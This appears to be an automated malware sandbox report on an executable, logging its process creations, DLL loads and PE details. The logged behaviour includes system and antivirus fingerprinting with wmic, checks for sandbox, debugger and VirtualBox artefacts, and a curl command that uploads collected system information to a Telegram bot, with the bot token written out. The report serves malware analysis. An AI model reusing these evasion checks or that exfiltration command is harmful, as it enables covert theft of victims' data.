Source: C:\Windows\System32\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" baseboard get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" cpu get nameJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get totalphysicalmemoryJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" diskdrive get model,sizeJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayNameJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\getmac.exe "getmac"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\systeminfo.exe "systeminfo"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dbghelp.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m api_log.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dir_watch.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m pstorec.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m vmcheck.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m wpespy.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get modelJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxservice.exe"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxtray.exe"Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get identifyingnumberJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\curl.exe "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=284330-4180-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\systeminfo.exe "systeminfo"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dll
Source: 9KEZfGRjyK.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 9KEZfGRjyK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: data.pdb source: 9KEZfGRjyK.exe
Source: Binary string: data.pdb)444 source: 9KEZfGRjyK.exe
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
